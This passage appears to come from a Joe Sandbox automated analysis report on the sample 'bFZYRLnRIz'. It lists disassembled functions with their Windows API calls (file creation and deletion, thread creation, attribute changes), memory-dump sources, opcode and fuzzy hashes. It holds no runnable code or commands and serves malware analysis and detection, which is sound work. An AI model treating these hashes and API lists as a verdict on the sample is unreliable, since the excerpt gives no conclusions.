Instruction Fuzzy Hash: 425184B2F14E5284FB00AB65EC452AEA322AF457B4F904635DE1C1B7D5EF6CD448D360

Function 00007FF716142D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF716142D7B

Part of subcall function 00007FF7161427FC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF71614281E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF716142D90
__scrt_release_startup_lock.LIBCMT ref: 00007FF716142DFE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF716142E51

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction ID: 71122a735e8ace951de7d873e0349c3ddc68ecda60251f02c4d8c6ede73cf0bc
Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
Instruction Fuzzy Hash: BC312C31A0C91341FA54BB66BC523FBD2919F413A4FC58434D94E572D7EF2DA88DA270

Function 00007FF716123684 Relevance: 6.1, APIs: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF71612309D), ref: 00007FF7161236CE
CreateDirectoryW.KERNEL32 ref: 00007FF716123733
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF71612309D), ref: 00007FF716123791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161237CE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: 623c7cdad90b96bec9a950f5b6d0d98be22cc1c56ccb42caf94d3fb3334d27cf
Instruction ID: 3373fe76cf774ba0dd8d28268d51fde74d8e0e4218a963c7ad2e77ec248de17b
Opcode Fuzzy Hash: 623c7cdad90b96bec9a950f5b6d0d98be22cc1c56ccb42caf94d3fb3334d27cf
Instruction Fuzzy Hash: D131A961A1CE82C1FB60AB25B84527BE362BF897B0FE04235DE9D436D5DF3CD4499620

Function 00007FF716122320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,00000000,00007FF716122927,?,00100000,?,00000001,00000000,00000000,?,00007FF7161214C1), ref: 00007FF716122348
ReadFile.KERNELBASE ref: 00007FF716122367
GetLastError.KERNEL32 ref: 00007FF71612239B
GetLastError.KERNEL32 ref: 00007FF7161223BA

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction ID: 8f9bea6c26440e1668fa5cf93e012637732bbea01e7da5f9c9cf4bf9cad9390c
Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
Instruction Fuzzy Hash: 7C214421A08D52C1F660AB15BC0027FE362BB49BA4FA48539DA5D4B688CF7CD8899761

Function 00007FF71612E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71612ECD8: ResetEvent.KERNEL32 ref: 00007FF71612ECF1
Part of subcall function 00007FF71612ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF71612ED07

ReleaseSemaphore.KERNEL32 ref: 00007FF71612E974
FindCloseChangeNotification.KERNELBASE ref: 00007FF71612E993
DeleteCriticalSection.KERNEL32 ref: 00007FF71612E9AA
CloseHandle.KERNEL32 ref: 00007FF71612E9B7

Part of subcall function 00007FF71612EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA63
Part of subcall function 00007FF71612EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF71612E95F,?,?,?,00007FF71612463A,?,?,?), ref: 00007FF71612EA6E

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 2143293610-0
Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction ID: 1b16768377597355647d63bbefb3077cd002d57425f9ccba6c7e35297528169f
Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
Instruction Fuzzy Hash: 8A012D32A19E91D2F788EB25F98426EE331FB85BA0F404035DB6D43625CF39E4B89750

Function 00007FF71612EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF71612EAE0
SetThreadPriority.KERNEL32 ref: 00007FF71612EB36

Strings

CreateThread failed, xrefs: 00007FF71612EAEE

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction ID: d75ce39bfae889a7812538045fabd1822988dd977fc2c99134891f183898ca35
Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
Instruction Fuzzy Hash: 1A115B32A08F4281F700AB24FC412ABF371FB947A4F948135DA4D02668DF3CE999D760

Function 00007FF71613946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71612DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF71612DDDF

OleInitialize.OLE32 ref: 00007FF716139486
SHGetMalloc.SHELL32 ref: 00007FF7161394D4

Strings

riched20.dll, xrefs: 00007FF716139475

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
Instruction ID: 11e28c170e1ca7b87245385d35816b7f77e448083ce5a9fda9ef58b6ebdf46c7
Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
Instruction Fuzzy Hash: 39F03C72A18E4182FB00AF20F8151ABF7A0FB88764F800135EA8D86A54DF7CD54DDB10

Function 00007FF71613095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71613853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF71613856C

Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB67
Part of subcall function 00007FF71612AAE0: LoadStringW.USER32 ref: 00007FF71612AB80

Part of subcall function 00007FF716111FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716111FFB

Part of subcall function 00007FF71611129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716111396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161401BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161401C1
SendDlgItemMessageW.USER32 ref: 00007FF7161401F2

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
String ID:
API String ID: 3106221260-0
Opcode ID: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
Instruction ID: 2b08646834283f46b2dca7531d12bf6593e8a569003182fadc9bdecf9a81bf38
Opcode Fuzzy Hash: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
Instruction Fuzzy Hash: 6951B572F04A4286FB00ABB5F8412FEA3229B85BA8F900135DE0D57796EE2CD548D350

Function 00007FF716122134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7161221CF
CreateFileW.KERNEL32 ref: 00007FF71612223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161222D8

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
Instruction ID: a645bbe60b1becdb6c87e561a6bcb8bb486c71814ed55c3fde75336d0feed283
Opcode Fuzzy Hash: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
Instruction Fuzzy Hash: 8A41C472A18A8182FB149B25F8446AEA3A1FB857B4F904334DFAD03AD5CF3DD498D610

Function 00007FF7161123F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF71611243E
GetWindowTextW.USER32 ref: 00007FF716112476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716112505

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
Instruction ID: 344776d556361767d7375b2ec4581833ee71967e23b88db8bd85ebb1356c70ad
Opcode Fuzzy Hash: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
Instruction Fuzzy Hash: E5218FB2A28B8181FA10AB65B84017BE365FB89BE0F544235EB9D03B99DF3CD194C740

Function 00007FF716131F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF71613205B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF716132077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF716132093

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
Instruction ID: 757af5a79590a966c5aa2a60a8626b40d270504d408a946d461c9e2c928c841f
Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
Instruction Fuzzy Hash: 1031D422A09E8651FB20BB14F8443FAA3A0FB407A4F948431D64D435A9DF7CD54EE311

Function 00007FF716123D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF7161307E1), ref: 00007FF716123D5E
SetFileAttributesW.KERNEL32 ref: 00007FF716123DB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716123E1A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
Instruction ID: 6d0041e50e49ee177adf1e86dd71948f1d7fa7b4cc6c984e1e782fc172d3b714
Opcode Fuzzy Hash: 9ad1da1d281fb88a90e37ecd930f681ad4649b1953909ec7c8adb17a28908e15
Instruction Fuzzy Hash: 5321FD22A18F8582FA20AB25F84526BE361FF857A4F904234EE9D436D5EF3CD548D610

Function 00007FF7161231BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF716130822), ref: 00007FF7161231E7
DeleteFileW.KERNEL32 ref: 00007FF716123237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161232A1

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
Instruction ID: 7a75d1722257351f22d834b140d2ad1f21843cd39cfe33e3bed02654d863f9ae
Opcode Fuzzy Hash: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
Instruction Fuzzy Hash: 8721D872A18F8181FA10AB25F84426FE361FF85BA4F901234EA9D43699DF3CD145D660

Function 00007FF7161232BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF71612E5B1,?,?,?,00000000,?), ref: 00007FF7161232E7
GetFileAttributesW.KERNELBASE ref: 00007FF716123334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716123399

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
Instruction ID: 3612f31251fa0c51bf754155a7331507f6ac9521d5adab2c870565cf001f8af1
Opcode Fuzzy Hash: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
